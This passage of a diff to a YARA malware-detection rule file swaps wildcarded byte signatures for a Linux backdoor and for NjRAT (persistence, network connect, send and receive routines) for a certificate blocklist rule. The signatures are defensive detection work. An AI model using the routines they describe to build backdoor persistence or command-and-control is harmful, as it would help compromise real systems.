-            ?? ?? ?? ?? 48 89 E6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 BE ?? ?? ?? ?? 48 89
-            DF E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 C0 ?? 89 C5 29 DD 8D 7D ?? 48 63 FF E8 ?? ??
-            ?? ?? 48 63 D5 48 89 C3 48 89 C7 C6 04 02 ?? 48 8B 34 24 E8 ?? ?? ?? ?? 48 89 DF E8
-            ?? ?? ?? ?? 48 89 DE 48 89 C2 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ??
-            BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 B8 ?? ?? ??
-            ?? 48 83 EB ?? 48 39 D8 75 ?? 48 83 C4 ?? 5B 5D C3
-        }
-		$generate_machine_id_v11 = {
-            41 57 BE ?? ?? ?? ?? 49 89 FF 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 9C
-            24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ??
-            ?? 31 C9 BA ?? ?? ?? ?? 48 89 DE 4C 89 EF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41
-            BE ?? ?? ?? ?? 48 83 EB ?? 4C 39 F3 0F 85 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8B
-            B4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 84 24
-            ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D 94 24 ??
-            ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 31 C9 BA ??
-            ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39
-            DE 0F 85 ?? ?? ?? ?? 48 89 EE 4C 89 E7 E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8D
-            BC 24 ?? ?? ?? ?? 48 8B 56 ?? E8 ?? ?? ?? ?? 31 FF 4C 8B AC 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C6 48 8D BC 24 ?? ?? ??
-            ?? F7 EA 89 F1 89 F5 C1 F9 ?? C1 FA ?? 29 CA 69 D2 ?? ?? ?? ?? 29 D5 E8 ?? ?? ?? ??
-            48 8B 9C 24 ?? ?? ?? ?? 41 89 E8 31 C0 4C 89 E9 BE ?? ?? ?? ?? 48 89 E7 48 89 DA 48
-            83 EB ?? E8 ?? ?? ?? ?? 49 39 DE 89 C5 0F 85 ?? ?? ?? ?? 48 63 C5 48 8D 94 24 ?? ??
-            ?? ?? 48 8D BC 24 ?? ?? ?? ?? C6 04 04 ?? 48 89 E6 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ??
-            ?? ?? 48 89 E6 4C 89 FF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE
-            0F 85 ?? ?? ?? ?? 49 8D 5D ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48
-            83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE 0F
-            85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 81
-            C4 ?? ?? ?? ?? 4C 89 F8 5B 5D 41 5C 41 5D 41 5E 41 5F C3
-        }
-		$persistence_mechanism_redhat_v7 = {
-            48 89 6C 24 ?? 4C 89 7C 24 ?? 48 89 5C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 4C 89 74
-            24 ?? 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 8B 7D ?? 4C
-            8D 7D ?? 81 C7 ?? ?? ?? ?? 48 63 FF E8 ?? ?? ?? ?? 48 89 C3 48 8D 7C 24 ?? 48 89 EE
-            E8 ?? ?? ?? ?? 4C 8B 64 24 ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 4C 8D 74 24 ?? 4C 89 E2
-            E8 ?? ?? ?? ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 4C 89 F7 E8 ?? ?? ?? ?? 48
-            8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 E1 4C 89 E2 BE ?? ?? ?? ?? 48 89
-            DF 49 89 E9 4D 89 E0 31 C0 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 89 C5 B9 ?? ?? ?? ?? 89
-            C2 48 89 DE E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? 48 8B 54 24 ?? 48 89 DF BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ??
-            ?? 4C 89 E2 BE ?? ?? ?? ?? 48 89 DF 31 C0 E8 ?? ?? ?? ?? 48 98 48 89 E7 31 C9 C6 04
-            18 ?? BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 8B 2C 24 BE ?? ?? ?? ?? 48 89 EF E8
-            ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 DF 48 8D 5D ?? BD ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 39 EB 0F 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 39 DD 0F 85 ?? ?? ??
-            ?? 49 8D 5C 24 ?? 48 39 DD 0F 85 ?? ?? ?? ?? 49 81 FF ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
-            48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B B4 24 ??
-            ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
-        }
-		$get_device_name_v7 = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? BE ?? ?? ?? ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? B9 ?? ??
-            ?? ?? 4C 89 74 24 ?? 48 81 EC ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8D 5C 24 ?? BA ??
-            ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24
-            ?? 41 BD ?? ?? ?? ?? 48 83 EB ?? 4C 39 EB 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48
-            83 78 ?? ?? 75 ?? 48 8D 5C 24 ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
-            ?? 48 8B 15 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ??
-            E8 ?? ?? ?? ?? 4C 8B 64 24 ?? 48 89 E7 E8 ?? ?? ?? ?? 48 8B 2C 24 48 8D 5C 24 ?? 41
-            B8 ?? ?? ?? ?? 4C 89 E2 BE ?? ?? ?? ?? 31 C0 48 89 DF 48 89 E9 E8 ?? ?? ?? ?? 48 89
-            DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 5D ?? 49 39 DD 0F 85 ?? ?? ?? ?? 49 8D 5C 24 ?? 49 39 DD 0F
-            85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 4C 8B B4
-            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
-        }
-		$generate_machine_id_v7 = {
-            41 57 31 C9 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 49 89 FF 41 56 41 55 41 54 55 53 48 81 EC
-            ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ??
-            48 8B B4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B
-            84 24 ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 31 C9 BA
-            ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ??
-            48 8B B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 8B 56 ?? E8 ?? ?? ?? ?? 31 FF 4C
-            8B B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ??
-            ?? 89 C6 48 8D BC 24 ?? ?? ?? ?? F7 EA 89 F1 89 F5 C1 F9 ?? C1 FA ?? 29 CA 69 D2 ??
-            ?? ?? ?? 29 D5 E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41 89 E8 31 C0 4C 89 F1 BE ??
-            ?? ?? ?? 48 89 E7 41 BD ?? ?? ?? ?? 48 89 DA 48 83 EB ?? E8 ?? ?? ?? ?? 4C 39 EB 89
-            C5 0F 85 ?? ?? ?? ?? 48 63 C5 48 8D 94 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? C6 04
-            04 ?? 48 89 E6 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 E6 4C 89 FF E8 ?? ?? ??
-            ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 49 8D 5E ?? 49 39
-            DD 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ??
-            48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
-            ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 4C 89 F8 5B 5D 41 5C
-            41 5D 41 5E 41 5F C3
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( $persistence_mechanism_ubuntu ) and ( all of ( $network_communication_* ) ) and ( ( ( $change_timestamp_and_read_config_v11 ) and ( $persistence_mechanism_redhat_v11 ) and ( $generate_machine_id_v11 ) ) or ( ( $persistence_mechanism_redhat_v7 ) and ( $get_device_name_v7 ) and ( $generate_machine_id_v7 ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JAWRO SP Z O O" and pe.signatures [ i ] . serial == "03:32:d5:c9:42:86:9b:dc:ab:f5:a8:26:61:97:cd:14" and 1622160000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Njrat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4679C5398A279318365Fd77A84445699 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects NjRAT backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "578c813f-4bba-52cd-bcc7-4de2c3943cf7"
-		date = "2024-07-31"
-		modified = "2024-07-31"
+		id = "8d1810e7-9b64-52b3-91c6-f03832d61d3a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/ByteCode.MSIL.Backdoor.NjRAT.yara#L1-L266"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "eeecf90965e6952d8b9efc9d1e96eaa47709b1d69fc7d435f4aebaaf0191f317"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10462-L10478"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bdb68be92b3ba6b5eaa6e8e963529c0b9213942ba2552c687496ad5d12d5b472"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "NjRAT"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$persistence_mechanism_v1_p1 = {
-        00 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 7E ?? ?? ??
-        ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 16 2B ?? 17 13 ?? 11 ?? 39 ?? ?? ?? ??
-        00 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ??
-        7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 7E ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ??
-        ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 17 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ??
-        ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 0A
-        00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 00 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16
-        72 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 00 11 ?? 18 72 ?? ??
-        ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 00 11 ?? 1A 72 ?? ?? ?? ?? A2
-        00 11 ?? 28 ?? ?? ?? ?? 16 16 15 28 ?? ?? ?? ?? 26 DE ?? 25 28 ?? ?? ?? ?? 0B 00 28
-        ?? ?? ?? ?? DE ?? 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F
-        ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ??
-        ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-        DE ?? 25 28 ?? ?? ?? ?? 0C 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ??
-        ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E
-        ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25
-    }
-		$persistence_mechanism_v1_p2 = {
-        28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00
-        28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 1D 28 ?? ?? ?? ??
-        72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 00 1D
-        28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 19 73 ??
-        ?? ?? ?? 80 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00
-        7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 16
-        15 28 ?? ?? ?? ?? 26 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 18 28 ??
-        ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ??
-        ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 13 ?? 18 13 ?? 28
-        ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 13 ??
-        11 ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 28 ?? ?? ?? ?? 11 ?? 11
-        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ??
-        00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 72 ?? ?? ?? ??
-        11 ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11
-        ?? 72 ?? ?? ?? ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 72 ?? ?? ?? ??
-        11 ?? 28 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 11
-        ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28
-    }
-		$connect_v1_p1 = {
-        00 16 80 ?? ?? ?? ?? 20 D0 07 00 00 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 0B 00 07 13 ??
-        11 ?? 28 ?? ?? ?? ?? 00 00 00 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11
-        ?? 2C ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 14 80 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ??
-        ?? 0C 00 28 ?? ?? ?? ?? DE ?? 00 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25 28
-        ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ??
-        ?? ?? DE ?? 00 00 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ??
-        ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? ??
-        ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ??
-        6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 18
-        8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ??
-        ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2
-        00 11 ?? 14 14 14 17 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-        28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 17 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 00
-        72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ??
-        ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 7F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
-        ?? ?? ?? 13 ?? 2B ?? 00 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ??
-        ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
-    }
-		$connect_v1_p2 = {
-        00 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 00
-        11 ?? 17 7E ?? ?? ?? ?? A2 00 11 ?? 18 72 ?? ?? ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ??
-        A2 00 11 ?? 1A 72 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ??
-        ?? A2 00 11 ?? 18 72 ?? ?? ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? A2 00 11 ?? 1A 72 ??
-        ?? ?? ?? A2 00 11 ?? 1B 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1C 72 ?? ?? ?? ??
-        A2 00 11 ?? 1D 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1E 72 ?? ?? ?? ?? A2 00 11
-        ?? 1F ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ??
-        1F ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F
-        ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ??
-        7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 7E
-        ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 7E ??
-        ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 7E ?? ?? ??
-        ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 25 28 ?? ?? ?? ?? 13
-        ?? 00 28 ?? ?? ?? ?? DE ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 16 80 ?? ?? ?? ?? 28
-        ?? ?? ?? ?? DE ?? 00 00 DE ?? 11 ?? 28 ?? ?? ?? ?? 00 DC 7E ?? ?? ?? ?? 0A 2B ?? 06
-    }
-		$send_v1 = {
-        00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 16 0A 38 ?? ?? ?? ?? 00 00 7E ??
-        ?? ?? ?? 0B 00 07 13 ?? 11 ?? 28 ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13
-        ?? 11 ?? 2C ?? 16 0A DD ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 13 ?? 02 8E B7 0D 12 ?? 28 ??
-        ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 0C 11 ?? 08 16 08
-        8E B7 6F ?? ?? ?? ?? 00 11 ?? 02 16 02 8E B7 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ??
-        ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 16 11 ?? 6F ?? ?? ?? ?? B7 16 6F ?? ?? ?? ?? 26 00 DE
-        ?? 11 ?? 28 ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 11 ?? 28 ?? ?? ?? ??
-        00 11 ?? 13 ?? 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 16 80 ?? ?? ?? ?? 7E ?? ?? ?? ??
-        6F ?? ?? ?? ?? 00 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 28 ??
-        ?? ?? ?? DE ?? 00 7E ?? ?? ?? ?? 0A 2B ?? 06
-    }
-		$receive_v1_p1 = {
-        00 00 00 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ??
-        13 ?? 11 ?? 39 ?? ?? ?? ?? 15 6A 0A 16 0B 00 00 00 07 17 D6 0B 07 1F ?? (FE | 01) ??
-        13 ?? 11 ?? 2C ?? 16 0B 17 28 ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 ??
-        11 ?? 2C ?? 00 DD ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 (FE | 04) ?? 13 ??
-        11 ?? 2C ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 15 16 6F ?? ?? ?? ?? 26 00 00 00 7E ?? ??
-        ?? ?? 6F ?? ?? ?? ?? 16 (FE | 02) ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 06 15 6A (FE | 01) ??
-        13 ?? 11 ?? 39 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ??
-        ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 00 11 ?? 15 59 13 ?? 11 ?? 45 ?? ?? ?? ?? ?? ?? ?? ??
-        ?? ?? ?? ?? 2B ?? 00 00 DD ?? ?? ?? ?? 2B ?? 00 11 ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ??
-        ?? 13 ?? 06 16 6A (FE | 01) ?? 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 15
-        6A 0A 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 (FE | 02) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C
-        ?? 38 ?? ?? ?? ?? 00 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ??
-        ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 00 17 13 ?? 11 ?? 3A ??
-        ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 D6 17 DA 17 D6 8D ?? ?? ?? ?? 80 ?? ??
-        ?? ?? 06 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DA 0D 7E ?? ?? ?? ?? 8E B7 6A 09 (FE | 02)
-    }
-		$receive_v1_p2 = {
-        13 ?? 11 ?? 2C ?? 09 17 6A DA B7 17 D6 17 DA 17 D6 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 00
-        7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E B7 16 6F ?? ?? ??
-        ?? 0C 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 08 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ??
-        ?? ?? 06 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 15 6A 0A 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ??
